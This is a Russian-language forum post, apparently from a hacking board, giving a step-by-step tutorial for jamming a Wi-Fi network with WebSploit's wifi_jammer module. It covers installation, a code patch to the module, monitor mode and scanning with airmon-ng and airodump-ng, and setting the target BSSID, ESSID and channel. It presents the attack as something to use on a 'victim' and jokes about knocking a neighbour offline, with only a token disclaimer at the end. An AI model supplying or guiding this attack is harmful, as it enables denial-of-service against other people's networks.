WEBSPLOIT
программный комплекс, включающий в себя множество инструментов для атак на вэб ресурсы, беспроводные сети.
предустановлен в parro os, kali linux
устанавливаем в ubuntu командами от рут.
для начала скачиваем актуальную версию со страницы - https://sourceforge.net/projects/webspl ... p_redirect
распаковываем в домашнюю дирректорию, после чего открываем папку и запускаем в ней терминал ( для убунту заходим в распакованную папку, правая кнопка мыши и далее открыть в терминале) пишем команду-
$ sudo ./install.sh
дальше запускаем программу просто в консоли
$ sudo websploit
Отправлено спустя 21 минуту 11 секунд:
дальше есть некоторые сложности в использовании модулей программы, которые мы сейчас с вами исправим, дабы они нормально функционировали. небольшое предисловие, дело в том, что раньше вайфай модули переведенные в режим монитора назывались mon0 но с усовершенствованиями и нововведениями мы имеем девайс в режиме монитора как wlan0mon но разработчики вэбсплоит этот момент по видимому упустили и перевести стандартными средствами просраммы интерфей в режим не получится. делаем следующее- идем по пути /usr/share/websploit/modules/wifi_jammer.py
убеждаемся в наличии файла и открываем его в редакторе от имени рута-
$ sudo gedit /usr/share/websploit/modules/wifi_jammer.py
после чего файл откроется для редактирования, ищем следующие строки в тексте-
elif com[0:7] =='set mon':
options[3] = com[8:12]
меняем значение options[3] = com[8:12]
на options[3] = com[8:]
сохраняем файл, перезапускаем websploit
получаем следующее окно-
Отправлено спустя 15 минут 54 секунды:
поскольку сегодня мы разбираем именно модуль, позволяющий заглушить необходимую нам сеть вайфай, посредствам посыла множественных запросов на подключение клиентов, в результате чего точка доступа падает, то использовать мы будем модуль wifi_jammer
соответственно в строке вэбсплоит прописываем следующую команду
show modules которая покажет нам все доступные модули для использования. находим раздел wifi и снова пишем
use wifi/wifi_jammer
теперь открываем новый терминал и колдуем с нашей вайфай картой (если у вас убунту, то перед эти установите необходимое по с помощью команды - sudo apt-get install wifite ) продолжим
$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0 -здесь вы указываете именно свою карту это может быть wlan1 wlan2 и .т.д
далее запускаем сканирование сетей командой
$ sudo airodump-ng wlan0mon
Отправлено спустя 15 минут 1 секунду:
теперь перед нами открывается картина с данными обнаруженных сетей.... с указанием необходимых нам данных, нам необходимо знать три позиции целевой сети, а именно ESSID BSSID и CHANNEL
запоминаем либо копируем все это и возвращаемся в консоль websploit
> show options откроется список ввода параметров
> set BSSID (вводим BSSID нашей цели)
> set ESSID (вводим ESSID нашей цели)
> set channel (указываем канал жертвы)
> set mon wlan0mon
> set interface wlan0
теперь снова
> show options убеждаемся, что все параметры заданы и вводим команду на запуск
>run прочитав про себя "Отче наш" жмем ENTER и слышим вопли соседа по поводу пропавшего интернета.
на экране появятся дополнительные терминальные окна с бегущей информацией, падением уровня сигнала сети и т.д.
ВНИМАНИЕ!!! ВСЯ ИНФОРМАЦИЯ НЕ ЯВЛЯЕТСЯ ПРИЗЫВОМ К ДЕЙСТВИЮ ПРОТИВОЗАКОННОГО ХАРАКТЕРА А ЯВЛЯЕТСЯ ОБЗОРОМ ИНСТРУМЕНТОВ LINUX!
WEBSPLOIT -глушим wifi
Модератор: phantom